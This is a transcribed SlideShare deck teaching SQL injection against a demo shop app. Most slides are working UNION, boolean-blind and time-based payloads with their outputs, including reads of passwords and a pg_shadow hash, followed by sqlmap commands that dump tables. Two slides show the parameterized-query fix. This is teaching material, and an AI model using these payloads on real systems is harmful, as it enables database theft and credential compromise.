Uploaded byBilly Yang
SQL injection and SQLMap Introduction
This document discusses SQL injection techniques, including bypassing authentication, extracting data using UNION queries, blind SQL injection, and using the sqlmap tool to automate SQL injection attacks. It covers basic techniques like altering queries and using boolean operators to test for vulnerabilities. More advanced topics include extracting metadata, cracking passwords, making time-based blind queries, and configuring sqlmap for anonymous traffic through Tor.
![Hacking Your Way To Better Security - php[tek] 2016](https://cdn.slidesharecdn.com/ss_thumbnails/uqd0khzkrgkurabdbneg-signature-7dcd622b76c062c2eee3f98694b3b5ec21430a61a01fae765c25a1ac3086db5d-poli-160526150315-thumbnail.jpg?width=640&height=640&fit=bounds)
![Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]](https://cdn.slidesharecdn.com/ss_thumbnails/codedagentsdeck-251215155422-5497c599-thumbnail.jpg?width=640&height=640&fit=bounds)
SQL injection and SQLMap Introduction
- 1.
- 2.
- 3. http://xxx.xxx.xxx.xxx:5000/good? id=1 {"available": 200, "price":19, "name": "Easton E100P Bat Pack"} 2/32
- 4. http://xxx.xxx.xxx.xxx:5000/good? id=???????? {"available": 200, "price":19, "name": “PASSWORD!!”} 3/32
- 5. If the resultof injection is visible UNION is nice tool 4/32
- 6. How many columns? http://xxx.xxx.xxx.xxx:5000/good? id=1ORDER BY 5 Internal Server Error The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application. 5/32
- 7. Replace with fakerecord http://xxx.xxx.xxx.xxx:5000/good? id=1 UNION SELECT 0,’1’,2,3 ORDER BY 1 {"available": 3, "price": 2, "name": "1"} 6/32
- 8. http://xxx.xxx.xxx.xxx:5000/good? id=1 UNION SELECT 0,current_database(),2,3ORDER BY 1 {"available": 3, "price": 2, "name": "shopdb"} 7/32
- 9. List Table Name http://xxx.xxx.xxx.xxx:5000/good? id=1UNION SELECT 0,string_agg(table_name,’,’),2,3 FROM information_schema.tables WHERE table_schema = ‘public’ GROUP BY table_schema ORDER BY 1 {"available": 3, "price": 2, "name": “goods,account,…”} 8/32
- 10. List Column Name http://xxx.xxx.xxx.xxx:5000/good? id=1UNION SELECT 0,string_agg(column_name,’,’),2,3 FROM information_schema.columns WHERE table_name = ‘account’ GROUP BY table_name ORDER BY 1 {"available": 3, "price": 2, "name": “username,password,…”} 9/32
- 11. Crack Account Password http://xxx.xxx.xxx.xxx:5000/good? id=1UNION SELECT 0,password,2,3 FROM account LIMIT 1 {"available": 3, "price": 2, "name": “1234567”} 10/32
- 12. Can hacker getmore information? 11/32
- 13. http://xxx.xxx.xxx.xxx:5000/good? id=1 UNION SELECT 0,version(),2,3ORDER BY 1 {"available": 3, "price": 2, "name": "PostgreSQL 9.4.1 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.9.2-10ubuntu5) 4.9.2, 64-bit"} 12/32
- 14. http://xxx.xxx.xxx.xxx:5000/good? id=1 UNION SELECT 0,username,2,3FROM pg_user WHERE usesuper IS TRUE {"available": 3, "price": 2, "name": "postgres"} 13/32
- 15. http://xxx.xxx.xxx.xxx:5000/good? id=1 UNION SELECT 0,passwd,2,3FROM pg_shadow WHERE username = ‘postgres’ {"available": 3, "price": 2, "name": “md5ae50feb746fdbd2e7dc1b8d001555471"} 14/32
- 16. Unfortunately, when wecannot get result of injection…. 15/32
- 17. Blind SQL injection Ifthe vulnerable website just cover the error message, but the response still has different. 16/32
- 18. http://xxx.xxx.xxx.xxx:5000/good?id=1' AND TRUE-- {"available": 200, "price": 19, "name": "Easton E100P Bat Pack"} http://xxx.xxx.xxx.xxx:5000/good?id=1' AND FALSE -- {"available": 0, “price": 0, "name": ""} 17/32
- 19. http://xxx.xxx.xxx.xxx:5000/good?id=1' AND (SELECT LENGTH(username) FROMaccount LIMIT 1)>7 -- 18/32
- 20. http://xxx.xxx.xxx.xxx:5000/good?id=1' AND (SELECT SUBSTRING(username FROM1 FOR 1) FROM account LIMIT 1) = ‘l’ -- 19/32
- 21. Time Based Blind SQLinjection If the vulnerable website not only cover the error message, but the response also is same… 20/32
- 22. Stacked queries http://xxx.xxx.xxx.xxx:5000/good?id='; SELECT pg_sleep(3); SELECT‘’,’’,1,1 WHERE ‘’=‘ {"available": 1, "price": 1, "name": ""} 21/32
- 23. http://xxx.xxx.xxx.xxx:5000/good?id=1' AND (SELECT pg_sleep(3) FROMaccount WHERE SUBSTRING(username FROM 1 FOR 1) = ‘l’) IS NOT NULL -- {"available": 200, "price": 19, "name": "Easton E100P Bat Pack"} 22/32
- 24. Use Placeholder sql ='select * from goods where id = {}’.format(_id) engine.execute(sql).first() sql = text('select * from goods where id = :id') engine.execute(sql, id=_id).first() Bad sample Good sample 23/32
- 25. Use Placeholder select *from goods where id = 1; prepare good_select as select * from goods where id = $1; execute good_select(1); Bad sample Good sample 24/32
- 26. SQLMap Have tool helpsus play blind SQL injection automatically? 25/32
- 27. python sqlmap.py -u‘http://xxx.xxx.xxx.xxx:5000/good?id=1' 26/32
- 28. python sqlmap.py -u‘http://xxx.xxx.xxx.xxx:5000/good?id=1' --dbs python sqlmap.py -u ‘http://xxx.xxx.xxx.xxx:5000/good?id=1' -D public --tables python sqlmap.py -u ‘http://xxx.xxx.xxx.xxx:5000/good?id=1' -D public -T account --columns 27/32
- 29. python sqlmap.py -u‘http://xxx.xxx.xxx.xxx:5000/good?id=1' -D public -T account --dump python sqlmap.py -u ‘http://xxx.xxx.xxx.xxx:5000/good?id=1' --users 28/32
- 30. --banner --technique=BEUSTQ --level=1,2,3,4,5 GET and POSTparameters are always tested, HTTP Cookie header values are tested from level 2 HTTP User-Agent/Referer headers' value is tested from level 3. --risk=1,2,3,4 The default value is 1 which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also OR- based SQL injection tests. --second-order=visible_page_url Injection Configuration 29/32
- 31.
- 32. Reference • Google DorksList • DEFCON 17 - Advanced SQL Injection • pentestmonkey - Postgres SQL Injection Cheat Sheet • OWASP - SQL Injection Prevention Cheat Sheet 31/32
- 33.